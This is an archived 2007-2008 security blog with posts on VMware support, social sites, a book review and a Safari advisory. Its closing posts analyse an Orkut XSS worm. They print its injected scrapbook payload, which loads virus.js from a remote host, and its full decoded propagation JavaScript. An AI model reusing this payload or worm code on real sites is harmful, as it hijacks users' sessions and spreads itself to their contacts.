id="SPELLING_ERROR_33">virtualization</span> software (good) on Windows Server 2008 (bad, I'm using Server 2003.)<br /><br />So yes, they STILL turned me down for support on <span class="blsp-spelling-error" id="SPELLING_ERROR_34">ESX</span>. But they would support all of it if I was using Hyper-V.<br /><br />This is far worse than my little problem not being handled. This would seem to indicate that Microsoft intends to qualify every single app they produce as being covered on <span class="blsp-spelling-error" id="SPELLING_ERROR_35">VMWare</span> or not. And only the versions that they feel like. And only if it's on a Windows version they want to cover.<br /><br />So the latest set of articles on how to tune <span class="blsp-spelling-error" id="SPELLING_ERROR_36">SQL</span> Server 2005 on <span class="blsp-spelling-error" id="SPELLING_ERROR_37">ESX</span>? Forget it. It's not supported.<br /><br />It's really hard to not immediately leap to accusing Microsoft of more <span class="blsp-spelling-error" id="SPELLING_ERROR_38">anticompetitive</span> behavior and vendor lock-in for their own <span class="blsp-spelling-error" id="SPELLING_ERROR_39">virtualization</span> technology.<br /><br />Does Microsoft qualify every individual app on the hardware in the supported hardware list? Of course not. If the OS works, the apps should work. That is the basic job of the OS, yes? To abstract the hardware for the apps? So if Microsoft has qualified Windows 2003 on <span class="blsp-spelling-error" id="SPELLING_ERROR_40">ESX</span>, why should they decline to support <span class="blsp-spelling-error" id="SPELLING_ERROR_41">OWA</span> on it?<br /><br />Is there an Exchange 2007 SP1 supported hardware list somewhere I'm not aware of?<br /><br />At my most generous, I can assume that Microsoft Support is just not aware of Microsoft's own policies on this topic. And Microsoft Sales isn't either. My rep still says he can't help me. I can even see wanting to qualify Microsoft OSes on <span class="blsp-spelling-error" id="SPELLING_ERROR_42">ESX</span> "hardware", just like they would on Dell or HP. (Though when is the last time Microsoft Support even ASKED you what hardware you're running on?)<br /><br />But to try and take a policy that every app needs to be qualified individually, down to the service pack level? Unless you're on Microsoft's <span class="blsp-spelling-error" id="SPELLING_ERROR_43">virtualization</span> technology?<br /><br />That's just quite possibly criminal.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com18tag:blogger.com,1999:blog-18579416.post-51114389170684417852008-08-04T11:48:00.000-07:002008-08-04T11:49:30.422-07:00TwitterTwitter:<br /><a href="http://twitter.com/ryanlrussell">http://twitter.com/ryanlrussell</a><br /><br />Tweet, or something.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com1tag:blogger.com,1999:blog-18579416.post-46041255117269479872008-07-21T12:08:00.000-07:002008-07-21T12:21:14.043-07:00MyYearbookI've been wasting a bunch of time on MyYearbook.com, a MTWWTOSNS (massively time-wasting web-two-oh social-networking site.) If you'd like to descend into madness with me, click here join join for my personal gain:<br /><a href="http://www.myyearbook.com/join.php?ref=1211864511">Be Ryan's Friend</a><br /><br />Several interesting aspects to this one, for security people. First, the are many sociological aspects. For example, what happens if you tell people they <span style="font-style: italic; font-weight: bold;">can't</span> post naked pics? Second, there is a play money currency, which drives everyone's behavior. Finally, they are getting phished left and right from <span style="font-style: italic; font-weight: bold;">within</span> the site.<br /><br />And the staff there appears to be so woefully unprepared to deal with it. When I saw the phishing, I thought I might mail their abuse contact info (only email address I found published), and see if they needed info, if I could put them in touch with a takedown group, etc. I got bounces from gmail. Um, your abuse email at your own domain depends on gmail?<br /><br />The site is absolutely begging for someone to start using XSS. The game model they have basically demands it. For example, your popularity depends on profile views. And I can post a pretty wide range of HTML to someone in about 20 different ways. I haven't tried to see if I can find any XSS. Mostly because I don't trust myself not to abuse it.<br /><br />But my favorite thing about MyYearbook that I just realized, while sitting in JFK coming back from HOPE. This site is teaching millions of people how to do simple HTML. And nearly half of these people are below average intelligence.<br /><br />Edutainment, indeed.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-58408709910837504722008-07-18T23:10:00.000-07:002008-07-18T23:22:20.342-07:00Politics, $8.34 worthThis post is about politics, which I normally would avoid. But humor me this one time.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://seantevis.com/kansas/3000/running-for-office-xkcd-style/"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://farm4.static.flickr.com/3249/2676618297_4fe5d1d9ca_o.png" alt="" border="0" /></a>Click on the pic to have your geek heartstrings pulled. Short version: If he's willing and able to put this up, that's all I need to know. Don't care if he's pandering.<br /><br />Yeah, I gave him $8.34.<br /><br />Long version: Doesn't matter if he's in Kansas, I want people like this to succeed. Doesn't matter if I agree with all of his policies, you never get a candidate that matches exactly, and you can't count on them to implement them once in office. Plus, he appears to be able to change his mind based on <a href="http://seantevis.com/kansas/issue/illegal-immigration/">feedback</a>, holy crap.<br /><br />If you want more candidates like this, consider giving him the token donations (US only), and blog him up.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-27559920383788237032008-07-15T21:17:00.000-07:002008-07-15T21:18:52.031-07:00HOPEI'll be in NYC for HOPE, starting tomorrow. Any of you going to be there?Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-17896733185522419752008-06-08T14:26:00.000-07:002008-06-08T15:59:48.511-07:00Little BrotherI just finished reading <a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2FLittle-Brother-Cory-Doctorow%2Fdp%2F0765319853&tag=thievco&linkCode=ur2&camp=1789&creative=9325">Little Brother</a><img src="http://www.assoc-amazon.com/e/ir?t=thievco&l=ur2&o=1" alt="" style="border: medium none ! important; margin: 0px ! important;" border="0" height="1" width="1" /> by Cory Doctorow while on a plane to Seattle for a <a href="http://windowssecrets.com/">Windows Secrets</a> meetup.<br /><br />There are a few audiences one might rate this book against. Probably the only fair one is the one Cory wrote for, young adult readers who need an introduction to electronic civil rights (and civil rights in general, for that matter.) For that audience, I think he has succeeded admirably. I will make my copy available to my kids, and see if any of them have an opinion.<br /><br />To be sure, the book tries to indoctrinate readers to the cyber libertarian way of thinking. Since I happen to agree with that doctrine, I have no problem with that. (And yes, I gave up fighting the use of "cyber". I lose.)<br /><br />Another audience I might rate this book against is the one I put myself in. Middle-aged infosec people. Perhaps with a little amateur writer thrown in. I still recommend the book, but now I have to start breaking out caveats and picking nits.<br /><br />Spoilers ahoy.<br /><br />First off, how's the tech? This is a sliding graph. Compared to the vast majority of the books in the world, Cory's technical accuracy is quite high. There are extreme ends of this scale. For example, Dan Brown (The Da Vinci Code author) writes with basically zero tech accuracy. Amazingly good, page-turning drama. Horrible tech. So Dan's down at the great writing, lousy tech corner.<br /><br />If I may give my ego a backhanded stroke for a moment, I place myself up at the opposite corner. In the <a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Fs%3Furl%3Dsearch-alias%253Daps%26field-keywords%3Dstealing%2Bthe%2Bnetwork%26x%3D0%26y%3D0&tag=thievco&linkCode=ur2&camp=1789&creative=9325">Stealing the Network</a><img src="http://www.assoc-amazon.com/e/ir?t=thievco&l=ur2&o=1" alt="" style="border: medium none ! important; margin: 0px ! important;" border="0" height="1" width="1" /> series, I went way out of my way to make my tech 100% accurate. I also acknowledge that my writing probably sucks, so I like to think of myself as the anti-Dan Brown. Mercifully, my books are shelved in the Computer section of book stores.<br /><br />Cory's writing in Little Brother is good and his tech is very good. (For a not-specifically tech, non-hacking book). So he's in the upper-right quadrant of the graph.<br /><br />But of course I'm compelled to point out specific problems. Cory sacrifices some accuracy for plot in a few key places. And appropriately so, I think. The plot flows better this way. Biggest example is the RFID rewriting. The majority of the tags are not rewritable. Cory has kids running around doing non-contact rewrites of FastTrak and other cheap RFID tags. Doesn't work in real life. Nor, I believe, in the near future.<br /><br />Speaking of time, I can't recall spotting anything in the book that would indicate a specific year. I'm sure that's intentional. I've had my books described as being 10 minutes into the future. I think Cory's at 60 minutes. It reads like now plus 5 to 10 years.<br /><br />Cory's writing also snags in a few places. (Keep in mind, just because I can spot someone else doing it doesn't mean I can avoid doing it myself.) One of his purposes is to instruct. He doesn't assume the reader knows what an RFID tag is in the first place. This is where there's a big difference between random YA reader and someone like me who has been doing security for years.<br /><br />For me, he's way over-explaining, and the story grids to a halt. It's mostly first-person, and so are the explanations. But the first person goes from being aimed at someone in the story to being aimed at the reader. It's as if the main character turns to look straight out of the page at you. For someone who knows these things, it's like saying "money can be used for goods and services." So this lessened the enjoyment of the story aspect for me somewhat. But again, probably a tradeoff he made.<br /><br />I also am already caught up on all the technical and political aspects the book covers, so I didn't learn anything new there. But then I read Boing Boing, was around when the EFF was founded, have been going to various hacking conferences for over a decade, and know half of the people Cory used for source material.<br /><br />In my case, that leaves the story. On to the parts I did like. I find the overall plot, sadly, believable. It's almost entirely set in San Francisco and the Bay Area, where I live. So he gets local color points. He came up with a number of characters I care about. He made me angry about what was happening in the story. After the first couple of chapters, I had to spend all my spare time reading it.<br /><br />Let me see if I can help you categorize yourself as a person who would agree with the politics of this book, and would be ok sharing with a YA reader. Do you get mad every time <a href="http://thomashawk.com/">Thomas Hawk</a> links to a story about a photographer getting hassled by the police or a security guard? Do you want to call up and scream at a school board or principal when <a href="http://www.fark.com/">Fark</a> links to a story about some kid getting expelled for a t-shirt or haircut? Do you have nothing but contempt for the <a href="http://www.emergentchaos.com/archives/2008/06/praises_for_the_tsa.html">TSA</a> every time you find yourself removing your shoes at the airport?<br /><br />If the answer is yes, then you will probably "enjoy" the plot and be right on board with the political implication. Be prepared to spend the first half of the book angry.<br /><br />You know what else I liked? Cory didn't shy away from the other points of view in the discussion. He goes ahaead and points out how his main character is just like a terrorist. He gets screwed over by his parents for most of the book. Some of his own friends give up on him. Some of his trusted circle betray him. He doubts constantly. He suffers for it. It's not like Cory's position still isn't clear, but I appreciate him exposing all the costs.<br /><br />The big moral of the story is that intrusive government sucks. But the smaller moral is that you have to stand up for your own rights, and it's going to hurt.<br /><br /><a href="http://craphound.com/littlebrother/download/">Little Brother download page</a><a href="http://www.google.com/search?hl=en&safe=off&domains=boingboing.net&sitesearch=boingboing.net&q=%22little+brother%22&btnG=Search&sitesearch=boingboing.net"><br />Little Brother posts</a> on Boing Boing<a href="http://www.boingboing.net/2004/08/22/stealing-the-network.html"><br />Cory's review of one of my books</a> (seems only fair)Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-12173196365422810022008-05-31T10:27:00.000-07:002008-05-31T10:28:46.768-07:00Race to ZeroThe <a href="http://www.racetozero.net/">Race to Zero</a> contest.<br /><br />So, people are going to write some new packers? OK, no problem then.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-48845825591463876152008-05-30T21:43:00.000-07:002008-05-31T11:07:07.193-07:00Is Microsoft dropping Apple 0-day?Just saw this link show up in my RSS reader:<a href="http://www.microsoft.com/technet/security/advisory/953818.mspx"><br /></a><a href="http://www.microsoft.com/technet/security/advisory/953818.mspx">Microsoft Security Advisory (953818) Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform</a><br /><br />From the advisory:<br /><br /><blockquote>FAQ<br /><br /><b>What causes this threat?</b><br />A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user’s machine without prompting, allowing them to be executed. Safari is available as a stand-alone install or through the Apple Software Update application.<br /></blockquote><br />And<br /><br /><blockquote>Workarounds<p>Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.</p><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="listBullet" valign="top">•</td><td class="listItem"><p>Change the download location of content in Safari to a location other than ‘Desktop’</p><p>Launch Safari. Under the <b>Edit</b> menu select <b>Preferences</b>. </p><p>At the option where it states <b>Save Downloaded Files to:</b>, select a different location on the local drive. </p></td></tr></tbody></table></blockquote>So... that sounds a lot like if I were to download a desktop.ini file or something like that, I'd get my Windows all 0wned. As in, if I cared to, I probably wouldn't have to work too hard to figure out how to exploit this from Microsoft's description and workaround.<br /><br />Is this being exploited in the wild or something? Otherwise I kinda would have expected Microsoft to keep quiet until it was patched by Apple.<br /><br />I guess Apple <a href="http://www.betanews.com/article/Apple_pushing_iTunes_QT_users_on_Windows_to_download_Safari/1206113171">pushing Safari on Windows iTunes/Quicktime users</a> isn't looking so hot about now?<br /><br /><span style="font-weight: bold;">Update:</span><br />Aha, pointer from <a href="http://apple.slashdot.org/article.pl?sid=08/05/31/1214254">Slashdot</a> and <a href="http://www.theregister.co.uk/2008/05/31/microsoft_warns_against_apple_safari/">The Register</a>. The <a href="http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html">carpet bombing</a> seems to be the genesis, but that's not the whole story, since he doesn't talk about executing code.<br /><br /><span style="font-weight: bold;">Update2:</span><br /><a href="http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx">There it is</a>, it was found by Aviv Raff.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-82489939981902538882008-05-03T14:06:00.000-07:002008-05-03T14:20:10.491-07:00Tweaking content (administrivia)I have a tendency to write full essays, and only when I'm aroused enough to spend the time, and then only when I can afford the time at that moment. I've also avoided more personal and trivial stuff, because the blog is part of the <a href="http://networks.feedburner.com/Security-Bloggers-Network">Security Blogger's Network</a> and because most of you read this because of security-related things.<br /><br />Well, those are problems that have an easy technical solution. I've created a <a href="http://feeds.feedburner.com/ryanlrussellsecurity">security-only feed</a>. If you only want the security-related stuff (things I tag "security"), then change your subscription to this feed.<br /><br />If you want all the other crap I decide to come up with, continue to use the full feed.<br /><br />I titled the blog "ryanlrussell", I planned to have it be an egofest from the beginning, I just got sidetracked. So what have I been holding back on? Attempts at short fiction, things about my kids, other technology stuff, more things I want to keep a pointer to, and so on. You know that thing that thing that bloggers do that people complain about where they just point to some article and have a short comment without a lot of insight and value add? I'm going to do more of that.<br /><br />There will be a tsunami of content. Relatively speaking. Prepare for boarding.<br /><br />I'm going to go tweak old posts, which I'm sure will cause old articles to hit your readers again. Apologies in advance. Should be mostly a one-time thing.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com1tag:blogger.com,1999:blog-18579416.post-2433772145275383562008-03-22T15:27:00.000-07:002008-03-22T16:42:37.440-07:00Arr! VMWare is driving me nuts.Several random VMWare things I want to throw out there that bother me.<br /><br />At this point, I have used and continue to use most of VMWare's products. This started with Workstation back to 3.x.<br /><br />Oh, at let me get my biases out of the way; I run a QA department, and we use VMWare for everything we can. Nothing better than being able to restore to a know state or save off a machine exactly where it is when exhibiting a problem. BigFix, where I work, also makes an agent that runs inside the management partition on ESX 3.x boxes.<br /><br />VMWare Workstation - Great product, great price point. You can run multiple machines (a few), manage whole snapshot trees. Only really useful if you're in front of the box Workstation is running on. Gets the bleeding-edge features. VMs running under Workstation don't perform great, but are adequate if you give them enough physical RAM. Pretty much exactly matches expectations, but then it's the first product and is the one the others vary from. So in a very real way, this is what sets my expectations for the other products.<br /><br />VMWare Server - The first larger VMWare purchase I made was GSX Server, somewhere around $3,000US for the software, and a $6,000 Dell 2U running Windows to put it on (BigFix's money, not my personal budget). Not bad, performance is still not great, slightly worse than Workstation. Might be because of remote access latency. Shareable, remote access built-in, which is key. Only one snapshot though, which is an immediate problem. I can manually backup machines at the expense of 30 minutes instead of 60 seconds, and disk space per copy is the same as the original rather than a fraction like a snapshot. But I found I could have a library of 30 machines, and run around 15 simultaneously, depending.<br /><br />I originally assumed they had just left it out of GSX so far... or maybe, that was their hook to get people to go to ESX? I hadn't looked into ESX yet at the time. It's not a casual evaluation. That's about when VMWare made Server free. Hey, great right? No. There go my hopes of ever getting multiple snapshots on Server. Because VMWare would be insane to put that feature in the free product. For someone in my position, multiple snapshots are probably 40% of the advantage of ESX over Server. And I use ESX now, so why do I care? Because I can't give up Server! I have to keep using this intentionally crippled product. I'll get to why in a sec.<br /><br />VMWare ESX Server (family) - At this point BigFix has standardized on ESX for as many QA machines as possible. (We have stuff that runs on Mac, Solaris SPARC, AIX PPC, HP-UX PA-RISC and Itanium, Windows Itanium, Windows Mobile on ARM. The x86 virtualization doesn't help much on those. It could with Mac, but Apple only just recently allowed OS X Server on VMs. When I'm trying to qualify our product on OS X, I can't go the hackintosh route. Also, I have a DLP product and some Wake-on-LAN functions I need real machines for. Oh, and I have an agent that runs IN ESX. I can't run ESX in ESX....)<br /><br />But back to what I LIKE about ESX for a sec. It's the fastest of the bunch, scales better, has better remote access, better machine cloning, migration between physical ESX hosts and drives, and has MULTIPLE SNAPSHOTS. I put my team on ESX, and some of the install matrix stuff instantly takes half the time because of the snapshot feature alone. There's also a almost real infrastructure management. For my purposes, this means I get all my VMs in one window with one login. If you have more than one Server, then you log into each one separately (as far as I know. More on that in a sec, too.) I have as many as 30-40 machines running simultaneously per physical ESX box, out of a library coming up on 100, and it does a fantastic job at resource sharing the 8 cores and 16GB of RAM per physical box. It loves it some disk space, but that sort of thing happens when you build a hundred VMs averaging around 10GB each.<br /><br />Sure, it's a little pricey. I think I'm paying $3000-4000 per ESX box, plus something for Virtual Center, and I'm not sure what else. I'm buying $9,000 Dell 2Us now, because ESX can actually make us of the resources. And I'm in for an external Dell SATA drive array, 15 400GB drives RAIDed, giving my 1TB on one ESX box, and 1.4TB on the other ESX box. I think we paid $15,000-$20,000 for that. I get less clear on the costs at this point, because I can now just budget for more capacity, and my IT department is buying it. We're in the process of picking on a 40TB SAN for the big cutover, where I bring some other groups into production on ESX who have been suffering with Workstation and piles of external 500GB USB hard drives. We have a tiny bit of production virtualization that VMWare constantly touts, but 90% of my ESX use falls under QA-style use.<br /><br />Great, right? So one day, I grab the VMWare Converter tool (awesome tool!) to convert the last of my Server images over to ESX... and it balks. OK, no big deal.. I can make them again, they're just a few Win9x boxes, some Solaris x86 10... Hey, the Win9x OSes are missing from the list of standard OSes in the UI. I do some digging, and...<br /><br />Windows 9x is not supported on ESX.<br /><br />What? That can't be right... do some investigation... supported on Workstation... supported on Server. Not supported on ESX.<br /><br />The Solaris x86 10 doesn't seem to work so well on ESX either, though support is claimed. But only starting at a particular patch level. Uh, I kinda need to test compatibility all the way back to no patches, guys. But I haven't finished my heroic effort getting it running on ESX yet. (Not that I should have to work that hard, of course.)<br /><br />So in one shot, ESX has now forced me to maintain some number of Server machines. Sure, I already had to have piles of physical boxes for the random non-x86 unices. But I was so close on the Win9x. It should work. VMWare just doesn't want to. Can I have multiple snapshots on Server? No. Can I have Win9x on ESX? No. And I can't pay them for it, they don't want to.<br /><br />While I'm complaining, there's one more thing I don't like about ESX (besides the usualy incremental stuff). I have no idea what the various ESX pieces do, or if I have them, or if I want them, or what kind of setup I need for them. I know I have ESX, Converter, and Virtual Center. I think I want VMotion. I think it does cool stuff with automatically balancing loads and migrating machines. I think I need a SAN for that. I sure hope my IT guy who spec'd that and the SAN out has it straight. I think there are bundles that have some of what I want. And I don't know what else I'm missing.<br /><br />Like, I have Virtual Center. Does that help with my requirement for Server still? I don't think it does. I could be wrong. There's some ACE authentication product or something too, right? Why would I want that? What does it do?<br /><br />Why did you buy Determina?<br /><br />Now, if you actually know what you're doing with VMWare, you are assuming I haven't done my homework and haven't been to training and haven't been reading the docs and whitepapers. And you're right. But I'm the customer. I have entitlement issues. I define good products as ones that I can figure out without much work, that don't make me read the docs. I've been doing this for 25 years now, I like it this way. If I have to read your docs, then I lose for some reason. So when I can't figure out your product line a differentiation, that's ultimately our fault and you have made me bitter and/or sold me less. Make it simpler.<br /><br />And then when I HAVE figured out your product differentiation when you didn't really want me to (i.e. your artificial limitations), that's not so hot either.<br /><br />OK, I feel better thanks. And yes, for those of you who actually know the VMWare stuff in depth, PLEASE correct me.<br /><br />BTW, what brought on the rant? I've got a presentation next week on malware analysis. I need Windows for that, and I'm carrying around a MacBook Pro with Leopard lately. So I bought a copy of VMWare Fusion straight from VMWare for about $70 yesterday. That's about half the cost of Workstation (Windows/Linux host only.)<br /><br />It only does single snapshots.<br /><br />Could I give you the extra $50 for multiple snapshots, PLEASE?! I only need this on my laptop when I'm traveling. I will use just as much ESX when I'm at work, I promise.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-57538394467538228222008-03-04T21:32:00.000-08:002008-03-04T21:38:03.695-08:00My D&DLet me show you it.<br /><br /><a href="http://www.zooomr.com/photos/ryanlrussell/4409944/" title="Photo Sharing"><img src="http://static.zooomr.com/images/4409944_ea0040f79c.jpg" width="500" height="375" alt="DSC02024" /></a><br /><br />Set <A HREF="http://www.zooomr.com/photos/ryanlrussell/sets/29324/">here</A>Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-23815490557158092942007-12-19T00:22:00.000-08:002007-12-19T01:09:55.107-08:00More on Orkut wormYes, my HTML/Javascript-fu is weak. So much so that I didn't know we were dealing with pure Javascript. Javascript that just happens to exist to facilitate posting Flash movies and games, so that's why it has "Flash" written all over it.<br /><br />To back up several steps... I received an email from Orkut saying that someone I know had left me a scrapbook entry. I went and looked at it, and was puzzling over the non-Englishness of it from someone whom I know is an English speaker. Of course during that time my browser (Firefox on OS X) was busy doing the same to my Orkut contacts. Sorry about that guys!<br /><br />One of them is Jeremy Rauch. Within minutes of me looking at my scrapbook, I get email that Jeremy and others have now left me new scrapbook entries. This is about when I start to guess what's going on. I mail Jeremy to point out that he seems to have it now, and he says he knows... I gave it to him. Whoops! Jeremy was skeptical that Flash was really involved, since he has it blocked in his browser by default. He was right.<br /><br />So here is what I think is happening, to the best of my ability as someone with weak Javascript-fu. Take a look at the chunk of HTML that ends up as a scrapbook entry that I <a href="http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html">posted earlier</a>.<br /><br />It obviously pulls in a chunk of Javascript that is even named "virus.js". But why all the trickery with the Shockwave and flash stuff? If Orkut allows posting raw HTML, why the games? Why not just source virus.js and be done with it?<br /><br />So I did some experiments tonight. I tried the old script, alert 'hello I'm an XSS', etc... and that doesn't work. It says my rich content was rejected, see <a href="http://help.orkut.com/support/bin/answer.py?answer=66309&hl=en-US">here</a>.<br /><br />And yet, I can paste in a much more complicated embed a flash movie expression, and that DOES work. Though, it made me fill in a CAPTCHA. I suspect that CAPTCHA is brand new as of tonight, otherwise I'm not seeing how the worm worked so well.<br /><br />So the basic security challenge for Orkut here is that they want to allow some arbitrary HTML, but not others. As we have seen for many years with web-based email, that's a pretty hard problem to solve.<br /><br />So that's why the hoops to jump through. The worm author needed something that looked like a flash movie so that Orkut would allow posting it, but in fact allowed him to pull in arbitrary Javascript.<br /><br />This is where the <a href="http://blog.deconcept.com/swfobject/">SWFObject</a> library comes into play. Its purpose in life seems to be to make it easier to embed Flash stuff and have it play properly. Orkut is nice enough to make this library available to every browser that loads the Scrapbook (and probably other) pages. They keep it at <a href="http://img2.orkut.com/js/gen/scraps006.js">http://img2.orkut.com/js/gen/scraps006.js</a>, which they source for you.<br /><br />It looks to me like the worm author is able to build a SWFObject that includes the Javascript and causes it to be embedded in the Orkut page, thereby acting in the right context to have access to your Orkut cookies and all the good stuff that an AJAX worm needs. MySpace isn't alone in having all the good Web 2.0 worms anymore.<br /><br />Jeremy decoded and prettied up the obfuscated Javascript. You can see that code at the end. If you're watching carefully, you'll see this version has a different message as the scrap body than the one I originally posted. That means the person (presumably the worm author) who controls the virus.js download page has revved the file at least one. I have two different (obfuscated) versions. Since I believe Orkut was taking active measures to shut this thing down, I'm guessing the author changes the text in case Orkut was keying off that.<br /><br />Like I mentioned before, if the CAPTCHA is new, that should essentially stop this thing from spreading. This kind of worm has interesting implications for social sites. If this gets to be really common, it means you'll be answering CAPTCHAs or something similar left and right.<br /><br />Also worth noting is that stopping the worm doesn't stop other interesting attacks. I was still able to post the same embed chunk of code to my own scrapbook as an experiment, I just had to answer the CAPTCHA. So a human could still put something there. If they can use it to run Javascript, that still leaves open attacks where they can steal your cookies.<br /><br />It looks like the immediate problem is over. I probably won't have a lot more technical to say on this one. I hope that the Jeremiahs and RSnakes of the world will jump in soon and tell me how the worm actually works.<br /><br />Decoded Javascript:<br /><br />var index=0;<br />var POST=JSHDF["CGI.POST_TOKEN"];<br />var SIG=JSHDF["Page.signature.raw"];<br /><br />function createXMLHttpRequest(){<br /> try {<br /> return new<br /> ActiveXObject("Msxml2.XMLHTTP")<br /> }<br /> catch(e){<br /> } ;<br /><br /> try {<br /> return new ActiveXObject("Microsoft.XMLHTTP")<br /> }<br /> catch(e){<br /> };<br /><br /> try {<br /> return new XMLHttpRequest()<br /> }<br /> catch(e){<br /> } ;<br /> return null<br />};<br /><br />function setCookie(name,value,expires,path,domain,secure){<br /> var curCookie=name+"="+escape(value)+(expires?";expires="+expires.toGMTString():"")+(path?";path="+path:"")+(domain?";domain="+domain:"")+(secure?";secure":"");<br /> document.cookie=curCookie<br />};<br /><br />function getCookie(name){<br /> var dc=document.cookie;<br /> var prefix=name+"=";<br /> var begin=dc.indexOf(";"+prefix);<br /> if(begin==-1){<br /> begin=dc.indexOf(prefix);<br /> if(begin!=0){<br /> return false<br /> }<br /> } else {<br /> begin+=2<br /> };<br /> var end=document.cookie.indexOf(";",begin);<br /><br /> if(end==-1){<br /> end=dc.length<br /> };<br /> return unescape(dc.substring(begin+prefix.length,end))<br />};<br /><br />function deleteCookie(name,path,domain){<br /> if(getCookie(name)){ document.cookie=name+"="+(path?";path="+path:"")+(domain?";domain="+domain:"")+";expires=Thu, 01-Jan-70 00:00:01 GMT";<br /> history.go(0)<br /> }<br />};<br /><br />function loadFriends(){<br /> var xml=createXMLHttpRequest();<br /> if(xml){<br /> xml.open("GET","http://www.orkut.com/Compose.aspx",true);<br /> xml.send(null);<br /> xml.onreadystatechange=function(){<br /> if(xml.readyState==4){<br /> if(xml.status==200){<br /> var xmlr=xml.responseText;<br /> var div=document.createElement("div");<br /> div.innerHTML=xmlr;<br /> var select=div.getElementsByTagName("select").item(0);<br /> if(select){<br /> select.removeChild(select.getElementsByTagName("option").item(0));<br /> select.setAttribute("id","selectedList");<br /> select.style.display="none";<br /> document.body.appendChild(select);<br /> sendScrap()<br /> }<br /> } else {<br /> loadFriends()<br /> }<br /> }<br /> };<br /> xml.send(null)<br /> }<br />};<br /><br /><br />function cmm_join(){<br /> var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";<br /> var xml=createXMLHttpRequest();<br /> xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);<br /> xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');<br /> xml.send(send);<br /> xml.onreadystatechange=function(){<br /> if(xml.readyState==4){<br /> if(xml.status!=200){<br /> cmm_join();<br /> return<br /> };<br /> loadFriends()<br /> }<br /> }<br />};<br /><br />function sendScrap(){<br /> if(index==document.getElementById("selectedList").length){<br /> return<br /> };<br /> var scrapText="Boas festas de final de ano![silver]"+new Date().getTime()+"[/silver] ";<br /> var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;<br /><br /> var xml=createXMLHttpRequest();<br /> xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);<br /> xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");<br /> xml.send(send);<br /> xml.onreadystatechange=function(){<br /> if(xml.readyState==4){<br /> index++;<br /> var wDate=new Date;<br /> wDate.setTime(wDate.getTime()+86400);<br /> setCookie('wormdoorkut',index,wDate);<br /> sendScrap()<br /> }<br /> }<br />};<br /><br />if(!getCookie('wormdoorkut')){<br /> var wDate=new Date;<br /> wDate.setTime(wDate.getTime()+86400);<br /> setCookie('wormdoorkut','0',wDate)<br />};<br /><br />index=getCookie('wormdoorkut');<br />cmm_join();Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-61142500412650227042007-12-18T21:02:00.000-08:002007-12-19T00:23:41.681-08:00Orkut "virus"More of a worm, actually.<br /><br />I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:<br /><pre wrap=""></pre><blockquote><pre wrap="">2008 vem ai... que ele comece mto bem para vc</pre></blockquote><br /><br />I still don't know exactly what it means, I'm assuming it's Portuguese. Babelfish wasn't any help. I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!<br /><br />I haven't done any kind of through analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:<br /><br /><div id="flashDiv295378627"><embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></embed></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');</script><br /><br />Looks like it joins you to an Orkut 